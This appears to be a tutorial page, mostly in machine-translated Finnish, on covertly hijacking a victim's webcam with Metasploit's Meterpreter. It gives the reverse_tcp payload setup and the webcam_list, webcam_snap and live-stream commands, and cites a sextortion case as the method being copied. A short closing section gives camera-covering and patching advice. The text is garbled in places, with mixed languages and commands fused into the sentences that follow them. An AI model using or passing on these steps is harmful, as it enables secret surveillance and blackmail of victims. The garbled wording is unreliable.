in this tutorial, we ’ll take a look at how we can hack into a webcam secretly and remote over the internet and take a cheek at what’ s going at the other side. Käytämme tehokasta Meterpreteriä ja Kali Linuxia murtautuaksemme uhrin web-kameraan. Otamme webbikameran haltuumme, laitamme sen päälle, otamme tilannekuvia ja jopa suoratoistamme suoraa videota kenenkään tietämättä.
vuoden 2014 alussa hakkeri tuomittiin 18 kuukaudeksi, koska hän oli tehnyt juuri tämän Miss Teen USA 2013: lle. Hän löysi haavoittuvuuden naisen tietokoneelta (kuten jonkin vanhentuneen ohjelmiston), otti muutaman paljastavan kuvan web-kamerasta ja kiristi uhria lähettämään lisää kuvia. Hänen käyttämänsä metodi on juuri sitä, mitä aiomme kokeilla täällä.
paras ystävämme meterpreter aikoo auttaa meitä tämän hakkeroinnin kanssa. Meterpreterin avulla voimme hallita jonkun web-kameraa, asentaa keyloggerin tai istuttaa omia viruksia, varastaa yksityisiä tietoja ja tehdä lähes mitä tahansa uhrin tietokoneella.
tässä opetusohjelmassa oletan, että olet jo käyttänyt hyökkäysmoduulia haavoittuvuuden hyödyntämiseen Metasploitilla (miten tämä tehdään?). Ryhdytään hommiin.
miten hakkeroida webcams?
Vaihe 1: Set up meterpreter.
kun olemme onnistuneet hyödyntämään uhria, meillä on nyt mahdollisuus asettaa haluamamme hyötykuorma. Hyötykuorma kertoo metasploitille, mitä tehdä uhrin tietokoneella, kun se murtautuu sisään. Meterpreter on hyötykuormamme. Seuraava komento määrittää hyötykuormamme:
set payload windows/meterpreter/reverse_tcpjos hyökkäys onnistui, metasploit asentaa automaattisesti meterpreterin kohdejärjestelmään ja voimme siirtyä web-kameran hakkerointiin.
Vaihe 2: Etsi webbikamera.
Meterpreterissä on sisäänrakennettu moduuli etäjärjestelmän web-kameran etsimiseen ja ohjaamiseen. Voimme aloittaa etsimällä, onko järjestelmässä edes web-kameraa tai not.me. alla olevaa komentoa käytetään siihen, se myös palauttaa meille web-kameran nimen.
meterpreter > webcam_listja nyt sinun pitäisi nähdä kohteesi webbikamera(t) listattuna ulostulossa.
Vaihe 3: Ota tilannekuvia
jos edellinen komento antoi meille webbikameran, voimme mennä eteenpäin ja napsia kuvan:
meterpreter > webcam_snapJa nyt sinun pitäisi nähdä kuva on tallennettu kansioon /opt/framework3/msf3 yksinkertaisesti pään yli sinne
askel 4: suoratoistaa reaaliaikaista videota Hakkeroidulta Webbikameralta
joten otimme vain kuvan, katsotaan miten saadaan live-videovirtaa. Voimme tehdä tämän kirjoittamalla komennon alla: (Käytämme –p parametria määritelläksemme hakemiston, jonka haluamme antaa videon suoratoistotiedostolle)
meterpreter > run webcam -p /var/wwwTämä komento sytyttää uhrin webbikameran ja lähettää videotulosteensa /var/www/webcam.htm. Voit avata tämän tiedoston ja tarkistaa, mitä tapahtuu toisessa päässä live video stream.
Miten estää oman web-kamerasi hakkerointi?
on olemassa useita tapoja hakkeroida web-kameroihin. Yllä olevassa esimerkissä, vain muutamalla pienellä komennolla voimme kurkistaa uhrin web-kameraan. Jokainen kokenut tietoturva-asiantuntija kertoo, että mikään järjestelmä ei ole täysin turvallinen. Siksi kamerat kannattaa pitää aina peitettyinä, kun niitä ei käytetä. Itse käytän tätä pientä vempainta sekä kannettavallani että älypuhelimellani.
mutta tämä ei tarkoita, etteikö käyttöjärjestelmää ja sovelluksia pitäisi vaivautua pitämään ajan tasalla, itse asiassa päinvastoin. Jos hakkeri saa web-kamerasi hallintaansa, järjestelmääsi on onnistuttu hyödyntämään, se on käytännössä nyt botti, hyökkääjän Orja. Tämä tarkoittaa, että hyökkääjä voi tehdä mitä tahansa järjestelmässäsi: käyttää yksityisiä tietojasi, nähdä mitä tahansa, mitä kirjoitat, sekä kaikki sivustot, joilla vierailet.
mitä laitetta käytät juuri nyt? Älypuhelin? Läppäri? Todennäköisesti tuijotat suoraan kameraan. Tunnetko olosi yhtäkkiä levottomaksi? Sinun pitäisi. Älä ota riskejä. Jos yksinkertaisesti peittää kamerat ja rutiininomaisesti päivittää kaikki ohjelmistot voit välttää uhriksi webcam hakata itse.